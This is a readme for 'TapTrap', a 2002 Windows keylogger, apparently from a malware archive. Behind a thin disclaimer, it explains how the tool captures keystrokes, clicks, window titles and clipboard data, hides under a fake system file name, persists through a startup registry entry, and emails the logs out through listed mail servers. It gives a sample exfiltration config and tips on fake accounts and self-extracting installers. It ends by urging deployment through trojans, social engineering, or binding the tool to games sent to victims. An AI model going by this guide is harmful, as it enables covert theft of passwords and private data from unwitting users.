by RattleSnake
Written in Visual C++
Released in April 2002
Project Name: TapTrap Project Type: Keylogger and Mouse Spy Project Compiler: Microsoft Visual C++ 6.0 Project Environment: Microsoft Windows 2000 Professional Note: I will use the word "user" instead of "victim", just because this wasn't made to be c/p stuff for scriptkiddies. This is a piece of code which should help you understand C/C++ and the Windows API a bit more. #include <stddisclaimer> I do not support any illegal activities you perform with this Software. Within theis readme file I will explain TapTrap from the view of a malicious Intruder, but you should only use the software for security auditing, securing your own machines or just to learn about the code. I am not responsible for anything you do with this program, malicious or not. Now let's finally start .... TapTrap is a Keylogger which uses the Windows API to log: a) Keystrokes as original ASCII characters, independant from the user's language. b) Window Names when being activated, so you know in which window / which context the buttons were pressed. c) Mouse clicks. When the user clicks the button "Cancel" in some window with the left mouse button, TapTrap will record that the user clicked his left mouse button on a window class named "button" with the caption "Cancel". Fine, hm? d) On Copy/Paste/Cut actions, TapTrap displays the Contents of the users clipboard. Furthermore, the Logs are sent to you from the remote user's machine automatically, using an email account specified by you or just trying different possible mailservers. Ok, you certainly want to know how to get it work. There are only two steps necessary to set up the Keylogger: 1) edit the configuration 2) run it on the remote machine As soon as the Program is being run on the remote machine, it copies its executable and the configuration file to the system directory, runs this copy of itself and exits. It adds an entry to the registry to be executed at startup and starts logging immediately. When an error occurs or the Application closes due to other problems, it attempts to restart itself. When it has collected enough logfiles on the users pc, it waits untill the user connects to hte internet and sends the files via email. The logs are stored in HTML format to make reading them rather comfortable. I suppose whetting your appetite was successfull already, so how to configure and run this baby ?? 1) Configuration ������������� A configuration file, config.ini, comes with this Program. Editing this file is the easy way to configure TapTrap, but the ini file has to be in the same directory as the executable when the program is run on the remote machine in order to make configuration possible. The other way to configure TapTrap is to get a Windows compiler, edit the Header file configure.h and to compile, link and bind TapTrap again. However, only those of you who know how to code in C/C++ should do that. I assume those who know C/C++ also understand this header file, and thus I wil only explain config.ini so far: # Start Config ini sample [mail_receiver] [email protected] display_name=RattleSnake [mail_send] [email protected] password_required=yes password=PASSWORD [email protected] server=mail.gmx.net [makefile] filename=\Win32Services.exe registryname=Win32sstart [limits] autobackup=20 timermax=20 storelogs=5 # End Config ini sample sendto_email is the email that the Keylogger's logs will be sent to. display_name it your name. Enter anything you want ;). Easy as a drunk nympho, quoting good old tuna - but how about the next section? Well, here you have to specify an Email account to send the email from. display_adress is the adress of this account, password and username are password and username (duh) and server specifies the SMTP Server (Mailserver) of the provider. password and username are stored in plaintext, exactly - and they are only used if password_required is set to "yes". I strongly suggest you do not use your own email account but create a new, fake account at yahoo, gmx or anywhere else. You can, however, also find an emailserver which allows you to send email anonymously and use that one. If you want TapTrap to try out multiple mailservers - no problem! # Start Config ini sample ... [mail_send] server=rome.ccomm.com;wisdom.psinet.net.au;emout17.mail.aol.com;mdr.de #End Config ini sample Exactly, you can simply add multiple servers by separating them with semicolons or commas. TapTrap will connect to each of them and send the email once it connected successfully. Now on to the makefile section These are fake names for TpTrap when it writes itself to the system directory and the registry. filename has to start with a backslash, just because I am a lazy coder. Check the code if you are terribly interested. filename is the name of the TapTrap exectable within the remote users system directory which will be run at startup. registryname is the name of the entry in the remote users registry which starts the executable at windows startup. Still with me? Good. autobackup is the ammount of keys a user can press untill the current logfile is backuped, prevents from loosing all logged data when the program crashes somehow. For all those of you who read and understand the code: timermax is used to randomize the timer loop which records the keytaps, check the code for more. Leave it as it is, thats what I would suggest. It should be a value between 15 and 50. storelogs is more interesting, it defines how many logs are stored on the remote machine untill TapTrap attempts to send them by email. That's it. Configuration finished. A little tip for windows 2000 users: - Press Start - Enter "iexpress.exe" - Click "Run" You can use this setup client to create neat setup applications. Just add TapTrap.exe and the configuration file and choose TapTrap.exe as the installation command. Make a self extracting setup exe and use this one - Easy as a drunk nypho, right! 2) Run it on the remote machine ���������������������������� Come on kids, use a Trojan, social engineer a bit and install it yourself, or just send it to rather stupid people. Or get a binder and bind it with some game, thats a nice idea as well ... - RattleSnake Server: size: 278.616 bytesMegaSecurity